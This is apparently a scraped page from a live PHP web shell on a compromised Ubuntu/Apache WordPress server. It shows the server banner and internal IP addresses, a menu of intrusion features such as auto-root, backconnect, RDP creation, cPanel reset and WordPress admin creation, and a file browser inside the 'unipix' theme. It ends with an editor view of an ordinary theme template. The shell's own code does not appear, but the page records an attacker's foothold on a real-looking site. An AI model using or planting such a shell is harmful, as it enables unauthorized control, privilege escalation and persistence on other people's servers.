Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mathtemp /
wp-content /
themes /
unipix /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
libs
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
.DS_Store
10
KB
-rw-r--r--
404.php
2.97
KB
-rw-r--r--
archive.php
8.39
KB
-rw-r--r--
comments.php
1.45
KB
-rw-r--r--
footer.php
375
B
-rw-r--r--
functions.php
10.51
KB
-rw-r--r--
header.php
1.74
KB
-rw-r--r--
index.php
8.4
KB
-rw-r--r--
page-single.php
659
B
-rw-r--r--
page.php
788
B
-rw-r--r--
pagination.php
1.32
KB
-rw-r--r--
readme.txt
231
B
-rw-r--r--
screenshot.png
123.3
KB
-rw-r--r--
search.php
1.64
KB
-rw-r--r--
searchform.php
511
B
-rw-r--r--
sidebar-page.php
741
B
-rw-r--r--
sidebar-single.php
1.27
KB
-rw-r--r--
sidebar.php
303
B
-rw-r--r--
single-rt-department.php
616
B
-rw-r--r--
single-rt-faculty.php
606
B
-rw-r--r--
single-rt-portfolios.php
269
B
-rw-r--r--
single-rt-program.php
637
B
-rw-r--r--
single-rt-research.php
609
B
-rw-r--r--
single-teams.php
4.45
KB
-rw-r--r--
single.php
4.76
KB
-rw-r--r--
style.css
18.08
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : single-teams.php
<?php get_header(); global $unipix_option; //take metafield value $location = get_post_meta( get_the_ID(), 'location', true ); $phone = get_post_meta( get_the_ID(), 'phone', true ); $email = get_post_meta( get_the_ID(), 'email', true ); $facebook = get_post_meta( get_the_ID(), 'facebook', true ); $twitter = get_post_meta( get_the_ID(), 'twitter', true ); $google_plus = get_post_meta( get_the_ID(), 'google_plus', true ); $linkedin = get_post_meta( get_the_ID(), 'linkedin', true ); $team_desination = get_post_meta( get_the_ID(), 'designation', true ); $short_desc = get_post_meta( get_the_ID(), 'shortbio', true ); $getin = get_post_meta( get_the_ID(), 'getin', true ); $getinurl = get_post_meta( get_the_ID(), 'getinurl', true ); while ( have_posts() ) : the_post(); ?> <div class="container"> <div id="content"> <div class="row btm-row bg-team team-single-p"> <div class="thunb col-lg-4 col-md-12"> <div class="inner-images"> <div class="ps-image"> <?php the_post_thumbnail(); ?> </div> </div> </div> <div class="col-lg-8 col-md-12"> <div class="team-information"> <div class="designation-info"> <?php echo esc_html($team_desination); ?> </div> <h1 class="team-name"><?php the_title(); ?></h1> <?php if(!empty($short_desc)): ?> <div class="short-desc"> <?php echo esc_html($short_desc); ?> </div> <?php endif; ?> <div class="team-address-text"> <?php if($email):?> <div class="adress-box mt-30"> <div class="icon-link"> <i class="rt-envelope"></i> </div> <div class="address-content"> <span class="fs-14"><?php echo esc_html__("Email Address",'unipix');?></span> <p class="fs-20"> <?php echo esc_html($email); ?></p> </div> </div> <?php endif; ?> <?php if($phone):?> <div class="adress-box mt-30"> <div class="icon-link"> <i class="rt-phone-volume"></i> </div> <div class="address-content"> <span class="fs-14"><?php echo esc_html__("Phone Number",'unipix');?></span> <p class="fs-20"> <?php echo esc_html($phone); ?></p> </div> </div> <?php endif; ?> <?php if($location):?> <div class="adress-box mt-30"> <div class="icon-link"> <i class="rt-location-dot"></i> </div> <div class="address-content"> <span class="fs-14"><?php echo esc_html__("Location",'unipix');?></span> <p class="fs-20"><?php echo esc_html( $location );?></p> </div> </div> <?php endif; ?> <?php if(!empty($getin)): ?> <a href="<?php echo esc_url( $getinurl );?>" class="theme_btn"><?php echo esc_html($getin);?></a> <?php endif; ?> </div> </div> </div> </div> </div> </div> <?php endwhile; ?> <?php the_content();?> <!-- Single Team End --> <?php get_footer();
Close